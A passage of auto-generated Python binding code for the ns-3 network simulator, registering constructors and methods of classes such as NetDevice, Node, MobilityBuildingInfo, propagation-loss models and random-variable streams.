[], is_virtual=True) return def register_Ns3MatrixPropagationLossModel_methods(root_module, cls): ## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::MatrixPropagationLossModel::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## propagation-loss-model.h (module 'propagation'): ns3::MatrixPropagationLossModel::MatrixPropagationLossModel() [constructor] cls.add_constructor([]) ## propagation-loss-model.h (module 'propagation'): void ns3::MatrixPropagationLossModel::SetLoss(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b, double loss, bool symmetric=true) [member function] cls.add_method('SetLoss', 'void', [param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b'), param('double', 'loss'), param('bool', 'symmetric', default_value='true')]) ## propagation-loss-model.h (module 'propagation'): void ns3::MatrixPropagationLossModel::SetDefaultLoss(double defaultLoss) [member function] cls.add_method('SetDefaultLoss', 'void', [param('double', 'defaultLoss')]) ## propagation-loss-model.h (module 'propagation'): double ns3::MatrixPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('DoCalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, visibility='private', is_virtual=True) ## propagation-loss-model.h (module 'propagation'): int64_t ns3::MatrixPropagationLossModel::DoAssignStreams(int64_t stream) [member function] cls.add_method('DoAssignStreams', 'int64_t', [param('int64_t', 'stream')], visibility='private', is_virtual=True) return def register_Ns3MobilityBuildingInfo_methods(root_module, cls): ## mobility-building-info.h (module 'buildings'): ns3::MobilityBuildingInfo::MobilityBuildingInfo(ns3::MobilityBuildingInfo const & arg0) [copy constructor] cls.add_constructor([param('ns3::MobilityBuildingInfo const &', 'arg0')]) ## mobility-building-info.h (module 'buildings'): ns3::MobilityBuildingInfo::MobilityBuildingInfo() [constructor] cls.add_constructor([]) ## mobility-building-info.h (module 'buildings'): ns3::MobilityBuildingInfo::MobilityBuildingInfo(ns3::Ptr<ns3::Building> building) [constructor] cls.add_constructor([param('ns3::Ptr< ns3::Building >', 'building')]) ## mobility-building-info.h (module 'buildings'): ns3::Ptr<ns3::Building> ns3::MobilityBuildingInfo::GetBuilding() [member function] cls.add_method('GetBuilding', 'ns3::Ptr< ns3::Building >', []) ## mobility-building-info.h (module 'buildings'): uint8_t ns3::MobilityBuildingInfo::GetFloorNumber() [member function] cls.add_method('GetFloorNumber', 'uint8_t', []) ## mobility-building-info.h (module 'buildings'): uint8_t ns3::MobilityBuildingInfo::GetRoomNumberX() [member function] cls.add_method('GetRoomNumberX', 'uint8_t', []) ## mobility-building-info.h (module 'buildings'): uint8_t ns3::MobilityBuildingInfo::GetRoomNumberY() [member function] cls.add_method('GetRoomNumberY', 'uint8_t', []) ## mobility-building-info.h (module 'buildings'): static ns3::TypeId ns3::MobilityBuildingInfo::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## mobility-building-info.h (module 'buildings'): bool ns3::MobilityBuildingInfo::IsIndoor() [member function] cls.add_method('IsIndoor', 'bool', []) ## mobility-building-info.h (module 'buildings'): bool ns3::MobilityBuildingInfo::IsOutdoor() [member function] cls.add_method('IsOutdoor', 'bool', []) ## mobility-building-info.h (module 'buildings'): void ns3::MobilityBuildingInfo::SetIndoor(ns3::Ptr<ns3::Building> building, uint8_t nfloor, uint8_t nroomx, uint8_t nroomy) [member function] cls.add_method('SetIndoor', 'void', [param('ns3::Ptr< ns3::Building >', 'building'), param('uint8_t', 'nfloor'), param('uint8_t', 'nroomx'), param('uint8_t', 'nroomy')]) ## mobility-building-info.h (module 'buildings'): void ns3::MobilityBuildingInfo::SetIndoor(uint8_t nfloor, uint8_t nroomx, uint8_t nroomy) [member function] cls.add_method('SetIndoor', 'void', [param('uint8_t', 'nfloor'), param('uint8_t', 'nroomx'), param('uint8_t', 'nroomy')]) ## mobility-building-info.h (module 'buildings'): void ns3::MobilityBuildingInfo::SetOutdoor() [member function] cls.add_method('SetOutdoor', 'void', []) return def register_Ns3NakagamiPropagationLossModel_methods(root_module, cls): ## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::NakagamiPropagationLossModel::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## propagation-loss-model.h (module 'propagation'): ns3::NakagamiPropagationLossModel::NakagamiPropagationLossModel() [constructor] cls.add_constructor([]) ## propagation-loss-model.h (module 'propagation'): double ns3::NakagamiPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('DoCalcRxPower', 'double', [param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, visibility='private', is_virtual=True) ## propagation-loss-model.h (module 'propagation'): int64_t ns3::NakagamiPropagationLossModel::DoAssignStreams(int64_t stream) [member function] cls.add_method('DoAssignStreams', 'int64_t', [param('int64_t', 'stream')], visibility='private', is_virtual=True) return def register_Ns3NetDevice_methods(root_module, cls): ## net-device.h (module 'network'): ns3::NetDevice::NetDevice() [constructor] cls.add_constructor([]) ## net-device.h (module 'network'): ns3::NetDevice::NetDevice(ns3::NetDevice const & arg0) [copy constructor] cls.add_constructor([param('ns3::NetDevice const &', 'arg0')]) ## net-device.h (module 'network'): void ns3::NetDevice::AddLinkChangeCallback(ns3::Callback<void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> callback) [member function] cls.add_method('AddLinkChangeCallback', 'void', [param('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'callback')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetAddress() const [member function] cls.add_method('GetAddress', 'ns3::Address', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetBroadcast() const [member function] cls.add_method('GetBroadcast', 'ns3::Address', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): ns3::Ptr<ns3::Channel> ns3::NetDevice::GetChannel() const [member function] cls.add_method('GetChannel', 'ns3::Ptr< ns3::Channel >', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): uint32_t ns3::NetDevice::GetIfIndex() const [member function] cls.add_method('GetIfIndex', 'uint32_t', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): uint16_t ns3::NetDevice::GetMtu() const [member function] cls.add_method('GetMtu', 'uint16_t', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetMulticast(ns3::Ipv4Address multicastGroup) const [member function] cls.add_method('GetMulticast', 'ns3::Address', [param('ns3::Ipv4Address', 'multicastGroup')], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetMulticast(ns3::Ipv6Address addr) const [member function] cls.add_method('GetMulticast', 'ns3::Address', [param('ns3::Ipv6Address', 'addr')], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): ns3::Ptr<ns3::Node> ns3::NetDevice::GetNode() const [member function] cls.add_method('GetNode', 'ns3::Ptr< ns3::Node >', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): static ns3::TypeId ns3::NetDevice::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## net-device.h (module 'network'): bool ns3::NetDevice::IsBridge() const [member function] cls.add_method('IsBridge', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::IsBroadcast() const [member function] cls.add_method('IsBroadcast', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::IsLinkUp() const [member function] cls.add_method('IsLinkUp', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::IsMulticast() const [member function] cls.add_method('IsMulticast', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::IsPointToPoint() const [member function] cls.add_method('IsPointToPoint', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::NeedsArp() const [member function] cls.add_method('NeedsArp', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::Send(ns3::Ptr<ns3::Packet> packet, ns3::Address const & dest, uint16_t protocolNumber) [member function] cls.add_method('Send', 'bool', [param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::SendFrom(ns3::Ptr<ns3::Packet> packet, ns3::Address const & source, ns3::Address const & dest, uint16_t protocolNumber) [member function] cls.add_method('SendFrom', 'bool', [param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'source'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): void ns3::NetDevice::SetAddress(ns3::Address address) [member function] cls.add_method('SetAddress', 'void', [param('ns3::Address', 'address')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): void ns3::NetDevice::SetIfIndex(uint32_t const index) [member function] cls.add_method('SetIfIndex', 'void', [param('uint32_t const', 'index')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::SetMtu(uint16_t const mtu) [member function] cls.add_method('SetMtu', 'bool', [param('uint16_t const', 'mtu')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): void ns3::NetDevice::SetNode(ns3::Ptr<ns3::Node> node) [member function] cls.add_method('SetNode', 'void', [param('ns3::Ptr< ns3::Node >', 'node')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): void ns3::NetDevice::SetPromiscReceiveCallback(ns3::Callback<bool,ns3::Ptr<ns3::NetDevice>,ns3::Ptr<const ns3::Packet>,short unsigned int,const ns3::Address&,const ns3::Address&,ns3::NetDevice::PacketType,ns3::empty,ns3::empty,ns3::empty> cb) [member function] cls.add_method('SetPromiscReceiveCallback', 'void', [param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, short unsigned int, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'cb')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): void ns3::NetDevice::SetReceiveCallback(ns3::Callback<bool,ns3::Ptr<ns3::NetDevice>,ns3::Ptr<const ns3::Packet>,short unsigned int,const ns3::Address&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> cb) [member function] cls.add_method('SetReceiveCallback', 'void', [param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, short unsigned int, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')], is_pure_virtual=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::NetDevice::SupportsSendFrom() const [member function] cls.add_method('SupportsSendFrom', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) return def register_Ns3NetDeviceQueue_methods(root_module, cls): ## net-device.h (module 'network'): ns3::NetDeviceQueue::NetDeviceQueue(ns3::NetDeviceQueue const & arg0) [copy constructor] cls.add_constructor([param('ns3::NetDeviceQueue const &', 'arg0')]) ## net-device.h (module 'network'): ns3::NetDeviceQueue::NetDeviceQueue() [constructor] cls.add_constructor([]) ## net-device.h (module 'network'): ns3::Ptr<ns3::QueueLimits> ns3::NetDeviceQueue::GetQueueLimits() [member function] cls.add_method('GetQueueLimits', 'ns3::Ptr< ns3::QueueLimits >', []) ## net-device.h (module 'network'): bool ns3::NetDeviceQueue::IsStopped() const [member function] cls.add_method('IsStopped', 'bool', [], is_const=True) ## net-device.h (module 'network'): void ns3::NetDeviceQueue::NotifyQueuedBytes(uint32_t bytes) [member function] cls.add_method('NotifyQueuedBytes', 'void', [param('uint32_t', 'bytes')]) ## net-device.h (module 'network'): void ns3::NetDeviceQueue::NotifyTransmittedBytes(uint32_t bytes) [member function] cls.add_method('NotifyTransmittedBytes', 'void', [param('uint32_t', 'bytes')]) ## net-device.h (module 'network'): void ns3::NetDeviceQueue::ResetQueueLimits() [member function] cls.add_method('ResetQueueLimits', 'void', []) ## net-device.h (module 'network'): void ns3::NetDeviceQueue::SetQueueLimits(ns3::Ptr<ns3::QueueLimits> ql) [member function] cls.add_method('SetQueueLimits', 'void', [param('ns3::Ptr< ns3::QueueLimits >', 'ql')]) ## net-device.h (module 'network'): void ns3::NetDeviceQueue::SetWakeCallback(ns3::Callback<void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function] cls.add_method('SetWakeCallback', 'void', [param('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')], is_virtual=True) ## net-device.h (module 'network'): void ns3::NetDeviceQueue::Start() [member function] cls.add_method('Start', 'void', [], is_virtual=True) ## net-device.h (module 'network'): void ns3::NetDeviceQueue::Stop() [member function] cls.add_method('Stop', 'void', [], is_virtual=True) ## net-device.h (module 'network'): void ns3::NetDeviceQueue::Wake() [member function] cls.add_method('Wake', 'void', [], is_virtual=True) return def register_Ns3NetDeviceQueueInterface_methods(root_module, cls): ## net-device.h (module 'network'): ns3::NetDeviceQueueInterface::NetDeviceQueueInterface(ns3::NetDeviceQueueInterface const & arg0) [copy constructor] cls.add_constructor([param('ns3::NetDeviceQueueInterface const &', 'arg0')]) ## net-device.h (module 'network'): ns3::NetDeviceQueueInterface::NetDeviceQueueInterface() [constructor] cls.add_constructor([]) ## net-device.h (module 'network'): void ns3::NetDeviceQueueInterface::CreateTxQueues() [member function] cls.add_method('CreateTxQueues', 'void', []) ## net-device.h (module 'network'): uint8_t ns3::NetDeviceQueueInterface::GetNTxQueues() const [member function] cls.add_method('GetNTxQueues', 'uint8_t', [], is_const=True) ## net-device.h (module 'network'): ns3::Callback<unsigned char, ns3::Ptr<ns3::QueueItem>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> ns3::NetDeviceQueueInterface::GetSelectQueueCallback() const [member function] cls.add_method('GetSelectQueueCallback', 'ns3::Callback< unsigned char, ns3::Ptr< ns3::QueueItem >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', [], is_const=True) ## net-device.h (module 'network'): ns3::Ptr<ns3::NetDeviceQueue> ns3::NetDeviceQueueInterface::GetTxQueue(uint8_t i) const [member function] cls.add_method('GetTxQueue', 'ns3::Ptr< ns3::NetDeviceQueue >', [param('uint8_t', 'i')], is_const=True) ## net-device.h (module 'network'): static ns3::TypeId ns3::NetDeviceQueueInterface::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## net-device.h (module 'network'): void ns3::NetDeviceQueueInterface::SetSelectQueueCallback(ns3::Callback<unsigned char, ns3::Ptr<ns3::QueueItem>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function] cls.add_method('SetSelectQueueCallback', 'void', [param('ns3::Callback< unsigned char, ns3::Ptr< ns3::QueueItem >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')]) ## net-device.h (module 'network'): void ns3::NetDeviceQueueInterface::SetTxQueuesN(uint8_t numTxQueues) [member function] cls.add_method('SetTxQueuesN', 'void', [param('uint8_t', 'numTxQueues')]) ## net-device.h (module 'network'): void ns3::NetDeviceQueueInterface::DoDispose() [member function] cls.add_method('DoDispose', 'void', [], visibility='protected', is_virtual=True) return def register_Ns3Node_methods(root_module, cls): ## node.h (module 'network'): ns3::Node::Node(ns3::Node const & arg0) [copy constructor] cls.add_constructor([param('ns3::Node const &', 'arg0')]) ## node.h (module 'network'): ns3::Node::Node() [constructor] cls.add_constructor([]) ## node.h (module 'network'): ns3::Node::Node(uint32_t systemId) [constructor] cls.add_constructor([param('uint32_t', 'systemId')]) ## node.h (module 'network'): uint32_t ns3::Node::AddApplication(ns3::Ptr<ns3::Application> application) [member function] cls.add_method('AddApplication', 'uint32_t', [param('ns3::Ptr< ns3::Application >', 'application')]) ## node.h (module 'network'): uint32_t ns3::Node::AddDevice(ns3::Ptr<ns3::NetDevice> device) [member function] cls.add_method('AddDevice', 'uint32_t', [param('ns3::Ptr< ns3::NetDevice >', 'device')]) ## node.h (module 'network'): static bool ns3::Node::ChecksumEnabled() [member function] cls.add_method('ChecksumEnabled', 'bool', [], is_static=True) ## node.h (module 'network'): ns3::Ptr<ns3::Application> ns3::Node::GetApplication(uint32_t index) const [member function] cls.add_method('GetApplication', 'ns3::Ptr< ns3::Application >', [param('uint32_t', 'index')], is_const=True) ## node.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::Node::GetDevice(uint32_t index) const [member function] cls.add_method('GetDevice', 'ns3::Ptr< ns3::NetDevice >', [param('uint32_t', 'index')], is_const=True) ## node.h (module 'network'): uint32_t ns3::Node::GetId() const [member function] cls.add_method('GetId', 'uint32_t', [], is_const=True) ## node.h (module 'network'): ns3::Time ns3::Node::GetLocalTime() const [member function] cls.add_method('GetLocalTime', 'ns3::Time', [], is_const=True) ## node.h (module 'network'): uint32_t ns3::Node::GetNApplications() const [member function] cls.add_method('GetNApplications', 'uint32_t', [], is_const=True) ## node.h (module 'network'): uint32_t ns3::Node::GetNDevices() const [member function] cls.add_method('GetNDevices', 'uint32_t', [], is_const=True) ## node.h (module 'network'): uint32_t ns3::Node::GetSystemId() const [member function] cls.add_method('GetSystemId', 'uint32_t', [], is_const=True) ## node.h (module 'network'): static ns3::TypeId ns3::Node::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## node.h (module 'network'): void ns3::Node::RegisterDeviceAdditionListener(ns3::Callback<void,ns3::Ptr<ns3::NetDevice>,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> listener) [member function] cls.add_method('RegisterDeviceAdditionListener', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'listener')]) ## node.h (module 'network'): void ns3::Node::RegisterProtocolHandler(ns3::Callback<void, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::Address const&, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty> handler, uint16_t protocolType, ns3::Ptr<ns3::NetDevice> device, bool promiscuous=false) [member function] cls.add_method('RegisterProtocolHandler', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'handler'), param('uint16_t', 'protocolType'), param('ns3::Ptr< ns3::NetDevice >', 'device'), param('bool', 'promiscuous', default_value='false')]) ## node.h (module 'network'): void ns3::Node::UnregisterDeviceAdditionListener(ns3::Callback<void,ns3::Ptr<ns3::NetDevice>,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> listener) [member function] cls.add_method('UnregisterDeviceAdditionListener', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'listener')]) ## node.h (module 'network'): void ns3::Node::UnregisterProtocolHandler(ns3::Callback<void, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::Address const&, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty> handler) [member function] cls.add_method('UnregisterProtocolHandler', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'handler')]) ## node.h (module 'network'): void ns3::Node::DoDispose() [member function] cls.add_method('DoDispose', 'void', [], visibility='protected', is_virtual=True) ## node.h (module 'network'): void ns3::Node::DoInitialize() [member function] cls.add_method('DoInitialize', 'void', [], visibility='protected', is_virtual=True) return def register_Ns3NormalRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): ns3::NormalRandomVariable::INFINITE_VALUE [variable] cls.add_static_attribute('INFINITE_VALUE', 'double const', is_const=True) ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::NormalRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::NormalRandomVariable::NormalRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetMean() const [member function] cls.add_method('GetMean', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetVariance() const [member function] cls.add_method('GetVariance', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetBound() const [member function] cls.add_method('GetBound', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetValue(double mean, double variance, double bound=ns3::NormalRandomVariable::INFINITE_VALUE) [member function] cls.add_method('GetValue', 'double', [param('double', 'mean'), param('double', 'variance'), param('double', 'bound', default_value='ns3::NormalRandomVariable::INFINITE_VALUE')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::NormalRandomVariable::GetInteger(uint32_t mean, uint32_t variance, uint32_t bound) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'mean'), param('uint32_t', 'variance'), param('uint32_t', 'bound')]) ## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::NormalRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3ObjectFactoryChecker_methods(root_module, cls): ## object-factory.h (module 'core'): ns3::ObjectFactoryChecker::ObjectFactoryChecker() [constructor] cls.add_constructor([]) ## object-factory.h (module 'core'): ns3::ObjectFactoryChecker::ObjectFactoryChecker(ns3::ObjectFactoryChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::ObjectFactoryChecker const &', 'arg0')]) return def register_Ns3ObjectFactoryValue_methods(root_module, cls): ## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue() [constructor] cls.add_constructor([]) ## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue(ns3::ObjectFactoryValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::ObjectFactoryValue const &', 'arg0')]) ## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue(ns3::ObjectFactory const & value) [constructor] cls.add_constructor([param('ns3::ObjectFactory const &', 'value')]) ## object-factory.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::ObjectFactoryValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## object-factory.h (module 'core'): bool ns3::ObjectFactoryValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## object-factory.h (module 'core'): ns3::ObjectFactory ns3::ObjectFactoryValue::Get() const [member function] cls.add_method('Get', 'ns3::ObjectFactory', [], is_const=True) ## object-factory.h (module 'core'): std::string ns3::ObjectFactoryValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## object-factory.h (module 'core'): void ns3::ObjectFactoryValue::Set(ns3::ObjectFactory const & value) [member function] cls.add_method('Set', 'void', [param('ns3::ObjectFactory const &', 'value')]) return def register_Ns3OhBuildingsPropagationLossModel_methods(root_module, cls): ## oh-buildings-propagation-loss-model.h (module 'buildings'): static ns3::TypeId ns3::OhBuildingsPropagationLossModel::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## oh-buildings-propagation-loss-model.h (module 'buildings'): ns3::OhBuildingsPropagationLossModel::OhBuildingsPropagationLossModel() [constructor] cls.add_constructor([]) ## oh-buildings-propagation-loss-model.h (module 'buildings'): double ns3::OhBuildingsPropagationLossModel::GetLoss(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function] cls.add_method('GetLoss', 'double', [param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')], is_const=True, is_virtual=True) return def register_Ns3ParetoRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ParetoRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::ParetoRandomVariable::ParetoRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetMean() const [member function] cls.add_method('GetMean', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetShape() const [member function] cls.add_method('GetShape', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetBound() const [member function] cls.add_method('GetBound', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetValue(double mean, double shape, double bound) [member function] cls.add_method('GetValue', 'double', [param('double', 'mean'), param('double', 'shape'), param('double', 'bound')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ParetoRandomVariable::GetInteger(uint32_t mean, uint32_t shape, uint32_t bound) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'mean'), param('uint32_t', 'shape'), param('uint32_t', 'bound')]) ## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::ParetoRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3QueueItem_methods(root_module, cls): cls.add_output_stream_operator() ## net-device.h (module 'network'): ns3::QueueItem::QueueItem(ns3::Ptr<ns3::Packet> p) [constructor] cls.add_constructor([param('ns3::Ptr< ns3::Packet >', 'p')]) ## net-device.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::QueueItem::GetPacket() const [member function] cls.add_method('GetPacket', 'ns3::Ptr< ns3::Packet >', [], is_const=True) ## net-device.h (module 'network'): uint32_t ns3::QueueItem::GetPacketSize() const [member function] cls.add_method('GetPacketSize', 'uint32_t', [], is_const=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::QueueItem::GetUint8Value(ns3::QueueItem::Uint8Values field, uint8_t & value) const [member function] cls.add_method('GetUint8Value', 'bool', [param('ns3::QueueItem::Uint8Values', 'field'), param('uint8_t &', 'value')], is_const=True, is_virtual=True) ## net-device.h (module 'network'): void ns3::QueueItem::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True) return def register_Ns3TimeValue_methods(root_module, cls): ## nstime.h (module 'core'): ns3::TimeValue::TimeValue() [constructor] cls.add_constructor([]) ## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::TimeValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::TimeValue const &', 'arg0')]) ## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::Time const & value) [constructor] cls.add_constructor([param('ns3::Time const &', 'value')]) ## nstime.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TimeValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## nstime.h (module 'core'): bool ns3::TimeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## nstime.h (module 'core'): ns3::Time ns3::TimeValue::Get() const [member function] cls.add_method('Get', 'ns3::Time', [], is_const=True) ## nstime.h (module 'core'): std::string ns3::TimeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] 